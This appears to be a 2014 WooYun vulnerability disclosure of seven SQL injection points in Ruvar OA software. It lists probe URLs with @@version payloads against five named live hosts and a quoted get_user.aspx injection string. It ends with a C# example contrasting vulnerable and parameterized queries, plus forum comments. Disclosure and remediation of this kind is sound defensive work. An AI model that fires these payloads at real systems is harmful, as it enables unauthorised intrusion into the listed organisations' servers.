2014-06-16: Details reported to the vendor, awaiting vendor handling
2014-06-21: Vendor confirmed; details disclosed to the vendor only
2014-06-24: Details opened to third-party security partners
2014-08-15: Details disclosed to core white hats and relevant domain experts
2014-08-25: Details disclosed to regular white hats
2014-09-04: Details disclosed to intern white hats
2014-09-14: Details disclosed to the public
Kept testing and found 7 more injection points
http://wooyun.org/bugs/wooyun-2014-065153
While digging further I found more of the same kind. As before, I picked a few live instances to verify each one. First location:
http://oa.gdjierong.com:8090/flow/flow_get_if_value.aspx?template_id=@@version
http://oa.mingshiedu.com:801/flow/flow_get_if_value.aspx?template_id=@@version
http://oa.ruvar.com/flow/flow_get_if_value.aspx?template_id=@@version
http://116.204.107.145:9000/flow/flow_get_if_value.aspx?template_id=@@version
http://www.kinghighway.com:9000/flow/flow_get_if_value.aspx?template_id=@@version
Second location:
http://oa.gdjierong.com:8090/include/get_dict.aspx?bt_id=@@version
http://oa.mingshiedu.com:801/include/get_dict.aspx?bt_id=@@version
http://oa.ruvar.com/include/get_dict.aspx?bt_id=@@version
http://116.204.107.145:9000/include/get_dict.aspx?bt_id=@@version
http://www.kinghighway.com:9000/include/get_dict.aspx?bt_id=@@version
Third location:
http://oa.gdjierong.com:8090/include/get_user.aspx
http://oa.mingshiedu.com:801/include/get_user.aspx
http://oa.ruvar.com/include/get_user.aspx
http://116.204.107.145:9000/include/get_user.aspx
http://www.kinghighway.com:9000/include/get_user.aspx
All three input fields on this page are injectable. Enter the following in any one of them and click Query:
%' and (select @@version)>0) --
Capturing the request with Firebug shows that the injection is triggered.
Fourth location:
http://oa.gdjierong.com:8090/LHMail/email_attach_delete.aspx?attach_id=@@version
http://oa.mingshiedu.com:801/LHMail/email_attach_delete.aspx?attach_id=@@version
http://oa.ruvar.com/LHMail/email_attach_delete.aspx?attach_id=@@version
http://116.204.107.145:9000/LHMail/email_attach_delete.aspx?attach_id=@@version
http://www.kinghighway.com:9000/LHMail/email_attach_delete.aspx?attach_id=@@version
Fifth location:
http://oa.gdjierong.com:8090/OnlineChat/chat_show.aspx?id=@@version
http://oa.mingshiedu.com:801/OnlineChat/chat_show.aspx?id=@@version
http://oa.ruvar.com//OnlineChat/chat_show.aspx?id=@@version
http://116.204.107.145:9000/OnlineChat/chat_show.aspx?id=@@version
http://www.kinghighway.com:9000/OnlineChat/chat_show.aspx?id=@@version
Sixth location:
http://oa.mingshiedu.com:801/OnlineChat/chatroom_show.aspx?id=@@version
http://oa.gdjierong.com:8090/OnlineChat/chatroom_show.aspx?id=@@version
http://oa.ruvar.com/OnlineChat/chatroom_show.aspx?id=@@version
http://116.204.107.145:9000/OnlineChat/chatroom_show.aspx?id=@@version
http://www.kinghighway.com:9000/OnlineChat/chatroom_show.aspx?id=@@version
Seventh location:
http://oa.gdjierong.com:8090/OnlineReport/get_condiction.aspx?t_id=@@version
http://oa.mingshiedu.com:801/OnlineReport/get_condiction.aspx?t_id=@@version
http://oa.ruvar.com/OnlineReport/get_condiction.aspx?t_id=@@version
http://116.204.107.145:9000/OnlineReport/get_condiction.aspx?t_id=@@version
http://www.kinghighway.com:9000/OnlineReport/get_condiction.aspx?t_id=@@version
Proof of vulnerability is as above. Taking a break.
Validate and parameterize these request parameters before they reach SQL.
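Why the probe works and what the fix looks like, as an added example that is not Ruvar OA's code (the application source is not on this page): a hypothetical ASP.NET handler in the shape of flow_get_if_value.aspx, first in the string-concatenation form that makes template_id=@@version succeed, then with type validation and a typed parameter. On SQL Server, `WHERE template_id = @@version` compares an int column with the nvarchar version string, and the resulting conversion error quotes that string, which is the signal each probe URL above is looking for. The get_user.aspx payload `%' and (select @@version)>0) --` does the same after closing a quoted, parenthesised LIKE pattern; that query shape, and every table and column name below, are assumptions.

```csharp
// Added example, not the vendor's code. Table/column names (flow_if, if_value,
// users, user_name) are assumed for illustration.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Globalization;

public static class FlowIfValue
{
    // VULNERABLE: the raw query-string value is spliced into the SQL text.
    // With template_id=@@version the engine evaluates @@version and tries to
    // convert its nvarchar result to int, failing with
    // "Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...'".
    // Any other SQL the caller supplies is executed in the same way.
    public static string BuildVulnerableSql(string templateId)
    {
        return "SELECT if_value FROM flow_if WHERE template_id = " + templateId;
    }

    // HARDENED, step 1: the id is numeric by contract, so reject anything that
    // is not a plain positive integer before it gets anywhere near SQL.
    public static int ParseTemplateId(string raw)
    {
        if (!int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out int id) || id <= 0)
            throw new ArgumentException("template_id must be a positive integer");
        return id;
    }

    // HARDENED, step 2: bind the value as a typed parameter. The SQL text is
    // constant, so the engine never parses attacker-controlled characters as SQL.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string raw)
    {
        var cmd = new SqlCommand("SELECT if_value FROM flow_if WHERE template_id = @id", conn);
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = ParseTemplateId(raw);
        return cmd;
    }

    // The get_user.aspx search boxes take free text, so there is nothing to
    // type-check; the fix is still a bound parameter. Escaping LIKE wildcards
    // additionally stops a user turning a name lookup into a match-everything
    // pattern (escape "[" first so the later replacements are not re-escaped).
    public static SqlCommand BuildSafeUserSearch(SqlConnection conn, string name)
    {
        var cmd = new SqlCommand(
            "SELECT user_id, user_name FROM users WHERE user_name LIKE @pat", conn);
        string escaped = name.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        cmd.Parameters.Add("@pat", SqlDbType.NVarChar, 100).Value = "%" + escaped + "%";
        return cmd;
    }
}
```

With the hardened version, `template_id=@@version` is refused by ParseTemplateId before a connection is even opened, and the get_user.aspx payload is delivered to the server as a literal search string, so the `'` and `)` it contains cannot close anything. The same two steps (validate to the expected type, then bind) apply to bt_id, attach_id, id and t_id in the other six locations.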
Severity: High
Vulnerability Rank: 20
Confirmed: 2014-06-21 12:55
None yet
@xsser @Finger @疯狗 Why was this routed as a small vendor? The one I submitted earlier went through as a large vendor, and this one goes as a small one? I'm not deliberately farming vulnerabilities or anything; this system really does have a lot of injections...
@what_news Well, it's a matter of the practical situation; it would flood the feed too easily.....
@xsser It's all bundled into one collection anyway. Okay, fine, haha, no problem. Now waiting for the World Cup.
@what_news :)